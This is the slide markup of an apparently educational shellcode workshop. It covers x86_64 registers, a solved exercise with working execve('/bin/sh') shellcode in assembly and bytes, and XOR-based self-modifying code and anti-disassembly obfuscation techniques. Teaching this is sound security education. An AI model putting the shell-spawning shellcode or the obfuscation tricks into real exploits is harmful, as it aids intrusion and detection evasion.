        <p:xfrm>
          <a:off x="685390" y="43520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221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0000000000000000 &lt;_start&gt;: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0:   eb 12               	jmp	14 &lt;_load_hello&gt;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0000000000000002 &lt;_real_start&gt;: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2:   5e                  	pop	rsi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3:   48 31 c0            	xor	rax,rax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6:   48 ff c0            	inc	rax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9:   48 89 c7            	mov	rdi,rax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c:   b2 0d               	mov	dl,0xd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e:   0f 05               	syscall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10:   b0 3c               	mov	al,0x3c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12:   0f 05               	syscall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0000000000000014 &lt;_load_hello&gt;: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14:   e8 e9 ff ff ff      	call   2 &lt;_real_start&gt;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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685346" y="0"/>
            <a:ext cx="84588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2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0x08 Writing an exec shellcode (Exercise)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="534" name="Google Shape;534;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685345" y="840260"/>
            <a:ext cx="8228100" cy="601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Exercise:</a:t>
            </a:r>
            <a:endParaRPr/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Write and execve shellcode.</a:t>
            </a:r>
            <a:endParaRPr/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Hint: sys_execve(/bin/sh, NULL, &amp;NULL)</a:t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54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rax   rdi              	    rsi                  	 rdx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59    const char *filename const char *const argv[] const char *const envp[]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15 minutes</a:t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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685396" y="50950"/>
            <a:ext cx="84588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99" lvl="0" marL="368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lang="fr-CA" sz="2400">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>0x08 Writing an exec shellcode (Exercise)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40" name="Google Shape;540;p71"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685390" y="8402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69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BITS 64</a:t>
                      </a:r>
                      <a:endParaRPr b="0"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 _start</a:t>
                      </a:r>
                      <a:endParaRPr b="0"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section .text</a:t>
                      </a:r>
                      <a:endParaRPr b="0"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_start:</a:t>
                      </a:r>
                      <a:endParaRPr b="0"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0" lang="fr-CA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xor rdx, rdx</a:t>
                      </a:r>
                      <a:endParaRPr b="0"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mov rax, rdx</a:t>
                      </a:r>
                      <a:endParaRPr b="0"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mov rbx, 0x68732f6e69622f41 ; "hs/nib/A"    ; Endianness</a:t>
                      </a:r>
                      <a:endParaRPr b="0"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shr rbx, 8</a:t>
                      </a:r>
                      <a:endParaRPr b="0"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push rbx</a:t>
                      </a:r>
                      <a:endParaRPr b="0"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mov rdi, rsp</a:t>
                      </a:r>
                      <a:endParaRPr b="0"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push rdx</a:t>
                      </a:r>
                      <a:endParaRPr b="0"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push rdi</a:t>
                      </a:r>
                      <a:endParaRPr b="0"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mov rsi, rsp</a:t>
                      </a:r>
                      <a:endParaRPr b="0"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mov al, 0x3b</a:t>
                      </a:r>
                      <a:endParaRPr b="0"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syscall</a:t>
                      </a:r>
                      <a:endParaRPr b="0"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41" name="Google Shape;541;p71"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685390" y="42094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221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0000000000000000 &lt;_start&gt;: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0:   48 31 d2            	xor	rdx,rdx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3:   48 89 d0            	mov	rax,rdx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6:   48 bb 41 2f 62 69 6e	movabs rbx,0x68732f6e69622f41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d:   2f 73 68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10:   48 c1 eb 08         	shr	rbx,0x8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14:   53                  	push   rbx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15:   48 89 e7            	mov	rdi,rsp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18:   52                  	push   rdx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19:   57                  	push   rdi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1a:   48 89 e6            	mov	rsi,rsp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1d:   b0 3b               	mov	al,0x3b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1f:   0f 05               	syscall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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685346" y="1732450"/>
            <a:ext cx="7765200" cy="4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fr-CA" sz="2800">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>Live demo</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-22860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-CA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https://asciinema.org/a/0hg3s1jmqiooxyn4og9q4pu50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3429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72"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685346" y="132475"/>
            <a:ext cx="84588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99" lvl="0" marL="368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lang="fr-CA" sz="2400">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>0x08 Writing an exec shellcode (Exercise)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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685346" y="0"/>
            <a:ext cx="84588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216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0x09 Extra miles: various obfuscation techniques.</a:t>
            </a:r>
            <a:br>
              <a:rPr b="0" i="0" lang="fr-CA" sz="216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CA" sz="216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216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3" name="Google Shape;553;p73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685345" y="840260"/>
            <a:ext cx="8228100" cy="601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fr-CA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fr-CA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modifying code</a:t>
            </a:r>
            <a:endParaRPr/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06400" lvl="0" marL="4572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onsolas"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="fr-CA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 + 5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CA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CA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Points to the address of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CA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r-CA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pop rax</a:t>
            </a:r>
            <a:endParaRPr b="1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onsolas"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="fr-CA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RAX + 8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CA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CA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points to bytes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CA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0x70, 0x81</a:t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onsolas"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-CA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0x7081 ⊕ 0x4141 = </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="fr-CA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0x31c0</a:t>
            </a:r>
            <a:endParaRPr b="1"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/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54" name="Google Shape;554;p73"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685345" y="16558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118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BITS 64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 _start:</a:t>
                      </a:r>
                      <a:endParaRPr sz="1500">
                        <a:solidFill>
                          <a:srgbClr val="B7B7B7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_start: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call $ + 5                 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="fr-CA" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="B7B7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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="fr-CA" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="B7B7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Push ret address, jmp to $ + 5</a:t>
                      </a:r>
                      <a:endParaRPr sz="1500">
                        <a:solidFill>
                          <a:srgbClr val="B7B7B7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pop rax                    </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="fr-CA" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="B7B7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Pop the retu</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="fr-CA" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="B7B7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rn address into RAX</a:t>
                      </a:r>
                      <a:endParaRPr b="0" sz="1200">
                        <a:solidFill>
                          <a:srgbClr val="B7B7B7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xor WORD [rax + 8], 0x4141 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="fr-CA" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="B7B7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Decode the instruction</a:t>
                      </a:r>
                      <a:endParaRPr sz="1500">
                        <a:solidFill>
                          <a:srgbClr val="B7B7B7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db 0x48, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="fr-CA" sz="12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0x70, 0x81        </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="fr-CA" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="B7B7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r>
                        <a:rPr b="0" lang="fr-CA" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="B7B7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Encoded bytes</a:t>
                      </a:r>
                      <a:endParaRPr b="0" sz="1500">
                        <a:solidFill>
                          <a:srgbClr val="B7B7B7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4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99" lvl="0" marL="368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lang="fr-CA" sz="2160">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>0x09 Extra miles: various obfuscation techniques.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0" name="Google Shape;560;p74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/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Pretty much everything can be used to modify code</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-11500" lvl="0" marL="36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61" name="Google Shape;561;p74"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685344" y="20017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28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mov, sub, sbb, inc, add, adc, xor, shr, shl</a:t>
                      </a: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xchg,</a:t>
                      </a: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etc…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5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99" lvl="0" marL="368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lang="fr-CA" sz="2160">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>0x09 Extra miles: various obfuscation techniques.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75"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/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To be able to modify the code the affected section need to have write permission.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-11500" lvl="0" marL="36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You can push your payload on the stack and perform the transformation there.</a:t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68" name="Google Shape;568;p75"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685345" y="8402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1189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BITS 64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 _start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section .text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_start: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call $ + 5 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" i="1" lang="fr-CA" sz="12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$ = current location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pop rax</a:t>
                      </a:r>
                      <a:endParaRPr b="0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xor WORD [rax + 8], 0x4141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db 0x48, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="fr-CA" sz="12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0x70, 0x81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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685346" y="0"/>
            <a:ext cx="84588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99" lvl="0" marL="368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lang="fr-CA" sz="2160">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>0x09 Extra miles: various obfuscation techniques.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p76"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685345" y="840260"/>
            <a:ext cx="8228100" cy="601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Testing our self modifying code?</a:t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https://asciinema.org/a/2asv7socak695q2ozdzus81yd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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685346" y="0"/>
            <a:ext cx="84588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99" lvl="0" marL="368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lang="fr-CA" sz="2160">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>0x09 Extra miles: various obfuscation techniques.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0" name="Google Shape;580;p77"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685345" y="840260"/>
            <a:ext cx="8228100" cy="601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It failed because the stack was not executable. Generally when you run your shellcode the section where the payload resides will be writable. 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By default .text section is read/exec only</a:t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81" name="Google Shape;581;p77"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="593658" y="20732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1189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oot@support:~/Desktop# readelf -S selfmod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There are 5 section headers, starting at offset 0x180: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Section Headers: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[Nr] Name          	Type         	Address       	Offset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	Size          	EntSize      	Flags  Link  Info  Align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[ 0]               	NULL         	0000000000000000  00000000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	0000000000000000  0000000000000000       	0 	0 	0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[ 1] .text         	PROGBITS     	0000000000400080  00000080</a:t>
                      </a:r>
                      <a:endParaRPr b="0" sz="12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	000000000000000f  0000000000000000  AX   	0 	0 	16</a:t>
                      </a:r>
                      <a:endParaRPr b="0" sz="12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[ 2] .symtab       	SYMTAB       	0000000000000000  00000090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	00000000000000a8  0000000000000018       	3 	3 	8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[ 3] .strtab       	STRTAB       	0000000000000000  00000138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	0000000000000025  0000000000000000       	0 	0 	1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[ 4] .shstrtab     	STRTAB       	0000000000000000  0000015d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	0000000000000021  0000000000000000       	0 	0 	1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 to Flags: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W (write), A (alloc), X (execute), M (merge), S (strings), I (info),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 (link order), O (extra OS processing required), G (group), T (TLS),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 (compressed), x (unknown), o (OS specific), E (exclude),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 (large), p (processor specific)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0x02 Analyzing « Hello World »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83" name="Google Shape;183;p24"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685343" y="12075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758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rax</a:t>
                      </a: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rbx, rcx, rdx, rsi, rdi, rbp, rsp, r8, r9, r10, r11, r12, r13, r14, r15, rip</a:t>
                      </a:r>
                      <a:endParaRPr b="0" sz="16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4" name="Google Shape;184;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="565896" y="1810709"/>
            <a:ext cx="8227995" cy="414524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These are all the standard registers available for the x86_64 architecture.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rax is the 64 bit version of the register.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rax = 0x0000000000000000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eax =         0x00000000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ax  =             0x0000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ah  =             0x</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="fr-CA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00</a:t>
            </a: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00</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p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al  = 				  0x00</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="fr-CA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00</a:t>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="20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54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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685346" y="0"/>
            <a:ext cx="84588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99" lvl="0" marL="368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lang="fr-CA" sz="2160">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>0x09 Extra miles: various obfuscation techniques.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7" name="Google Shape;587;p78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685345" y="840260"/>
            <a:ext cx="8228100" cy="601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Method #1: Use ld to make .text writable</a:t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88" name="Google Shape;588;p78"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="593658" y="20732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1189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</a:t>
                      </a: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oot@support:~/Desktop# </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="fr-CA" sz="12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ld -N selfmod.o -o selfmod</a:t>
                      </a:r>
                      <a:endParaRPr b="0" sz="12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root@support:~/Desktop# readelf -S selfmod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There are 5 section headers, starting at offset 0x180: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t/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Section Headers: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[Nr] Name          	Type         	Address       	Offset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	Size          	EntSize      	Flags  Link  Info  Align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[ 0]               	NULL         	0000000000000000  00000000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	0000000000000000  0000000000000000       	0 	0 	0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0" lang="fr-CA" sz="12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[ 1] .text         	PROGBITS     	0000000000400080  00000080</a:t>
                      </a:r>
                      <a:endParaRPr b="0" sz="12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0" lang="fr-CA" sz="12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	000000000000000f  0000000000000000 WAX   	0 	0 	16</a:t>
                      </a:r>
                      <a:endParaRPr b="0" sz="12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[ 2] .symtab       	SYMTAB       	0000000000000000  00000090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	00000000000000a8  0000000000000018       	3 	3 	8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[ 3] .strtab       	STRTAB       	0000000000000000  00000138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	0000000000000025  0000000000000000       	0 	0 	1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[ 4] .shstrtab     	STRTAB       	0000000000000000  0000015d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	0000000000000021  0000000000000000       	0 	0 	1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 to Flags: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W (write), A (alloc), X (execute), M (merge), S (strings), I (info),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 (link order), O (extra OS processing required), G (group), T (TLS),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 (compressed), x (unknown), o (OS specific), E (exclude),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 (large), p (processor specific)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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685346" y="0"/>
            <a:ext cx="84588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99" lvl="0" marL="368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lang="fr-CA" sz="2160">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>0x09 Extra miles: various obfuscation techniques.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4" name="Google Shape;594;p79"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685345" y="840260"/>
            <a:ext cx="8228100" cy="601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Method #2: Declare a new section in assembly</a:t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nsolas"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-CA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Uses a new </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="fr-CA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.nsec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CA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section</a:t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95" name="Google Shape;595;p79"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="593658" y="20732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118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lang="fr-CA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BITS 64</a:t>
                      </a:r>
                      <a:endParaRPr b="0" sz="900">
                        <a:solidFill>
                          <a:srgbClr val="B7B7B7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lang="fr-CA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section .nsec progbits alloc exec write align = 16 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="fr-CA" sz="900">
                          <a:solidFill>
                            <a:srgbClr val="B7B7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Write/exec ".nsec" section</a:t>
                      </a:r>
                      <a:endParaRPr b="0" sz="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lang="fr-CA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 _start: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sz="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lang="fr-CA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_start:</a:t>
                      </a:r>
                      <a:endParaRPr b="0" sz="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lang="fr-CA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call $ + 5                 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="fr-CA" sz="900">
                          <a:solidFill>
                            <a:srgbClr val="B7B7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Push ret address, jmp to $ + 5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lang="fr-CA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pop rax                    </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="fr-CA" sz="900">
                          <a:solidFill>
                            <a:srgbClr val="B7B7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Pop the return address into RAX</a:t>
                      </a:r>
                      <a:endParaRPr b="0" sz="900">
                        <a:solidFill>
                          <a:srgbClr val="B7B7B7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lang="fr-CA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xor WORD [rax + 8], 0x4141 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="fr-CA" sz="900">
                          <a:solidFill>
                            <a:srgbClr val="B7B7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Decode the instruction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db 0x48, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-CA" sz="9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0x70, 0x81        </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="fr-CA" sz="900">
                          <a:solidFill>
                            <a:srgbClr val="B7B7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Encoded bytes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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685346" y="0"/>
            <a:ext cx="84588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99" lvl="0" marL="368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lang="fr-CA" sz="2160">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>0x09 Extra miles: various obfuscation techniques.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1" name="Google Shape;601;p80"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685345" y="840260"/>
            <a:ext cx="8228100" cy="601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Testing our code again</a:t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https://asciinema.org/a/32t84sqoc03lzgpm39jgv7jqb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/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685346" y="0"/>
            <a:ext cx="84588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99" lvl="0" marL="368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lang="fr-CA" sz="2160">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>0x09 Extra miles: various obfuscation techniques.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81"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685345" y="840260"/>
            <a:ext cx="8228100" cy="601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The case of misaligned instruction.</a:t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The decompiler is too smart. It tries to interpret the instructions byte by byte </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="fr-CA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without understanding the context</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CA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 this case </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="fr-CA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0x34</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CA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is pure garbage and it will never been called. </a:t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608" name="Google Shape;608;p81"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="593658" y="15841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49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0:   eb 01               	jmp	3 &lt;_fake&gt;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2:   34 58               	xor	al,0x58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09" name="Google Shape;609;p81"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="593658" y="24600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8228025"/>
              </a:tblGrid>
              <a:tr h="49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0" lang="fr-CA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python OpAsm_v1.2.py 64 asm "jmp _fake; db 0x34; _fake: pop rax"</a:t>
                      </a:r>
                      <a:endParaRPr b="0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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685346" y="0"/>
            <a:ext cx="84588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99" lvl="0" marL="368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lang="fr-CA" sz="2160">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>0x09 Extra miles: various obfuscation techniques.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5" name="Google Shape;615;p82"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685345" y="840260"/>
            <a:ext cx="8228100" cy="601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Live analysis of an obfuscated sample</a:t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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685346" y="0"/>
            <a:ext cx="84588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99" lvl="0" marL="368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lang="fr-CA" sz="2160">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>0xffffffff: EOF.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1" name="Google Shape;621;p83"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685345" y="840260"/>
            <a:ext cx="8228100" cy="601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That’s it for us.</a:t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Peter: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CA" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="2C9CB6"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>@0xTowel</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="2C9CB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Charles: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CA" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="2C9CB6"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>@MrUn1k0d3r</a:t>
            </a:r>
            <a:endParaRPr sz="30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685346" y="0"/>
            <a:ext cx="84588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0x02 Analyzing « Hello World »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685345" y="840260"/>
            <a:ext cx="8228100" cy="601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131200" y="1810700"/>
            <a:ext cx="8948700" cy="4772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register_table.png"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900" y="970400"/>
            <a:ext cx="5744200" cy="576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0x02 Analyzing « Hello World »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99" name="Google Shape;199;p26"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="565895" y="28550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758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Memory   instruction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0x01</a:t>
                      </a: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mov rax, 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6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 0x02   mov rbx, 1</a:t>
                      </a:r>
                      <a:endParaRPr b="0" sz="16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0" name="Google Shape;200;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="565896" y="1810709"/>
            <a:ext cx="8227995" cy="414524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RIP is a special register that points to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CA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next instruction to be executed by the processor.</a:t>
            </a:r>
            <a:endParaRPr/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b="0" i="0" lang="fr-CA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 this case rip value will be 0x2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-11499" lvl="0" marL="36899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99" lvl="0" marL="36899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i="1" lang="fr-CA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Note: We have broken on instruction 0x02, thus it has not actually executed yet</a:t>
            </a:r>
            <a:endParaRPr i="1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685346" y="0"/>
            <a:ext cx="845865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r>
              <a:rPr b="0" i="0" lang="fr-CA" sz="3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0x02 Analyzing « Hello World »</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="3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685345" y="840260"/>
            <a:ext cx="8227995" cy="60177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07" name="Google Shape;207;p27"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="565895" y="28550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{7E42D928-1DF2-4F6E-B5C9-6E53AD981C50}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="7758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rsp: 0x7fffffffe6d0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0x7fffffffe6d0: 0x0000000000000001      0x00007fffffffe8ec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0x7fffffffe6e0: 0x0000000000000000      0x00007fffffffe8f8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0x7fffffffe6f0: 0x00007fffffffe90a      0x00007fffffffe91a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0x7fffffffe700: 0x00007fffffffe925      0x00007fffffffe976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0x7fffffffe710: 0x00007fffffffe998      0x00007fffffffe9ab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0x7fffffffe720: 0x00007fffffffe9b5      0x00007fffffffeed6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0x7fffffffe730: 0x00007fffffffeee2      0x00007fffffffef24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0x7fffffffe740: 0x00007fffffffef38      0x00007fffffffef47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0x7fffffffe750: 0x00007fffffffef51      0x00007fffffffef62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CA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0x7fffffffe760: 0x00007fffffffef6b      0x00007fffffffef76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8" name="Google Shape;208;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="565896" y="1810710"/>
            <a:ext cx="8227995" cy="117457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99" lvl="0" marL="368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fr-CA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RSP is a special register that points to a stack address</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-1150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500" lvl="0" marL="369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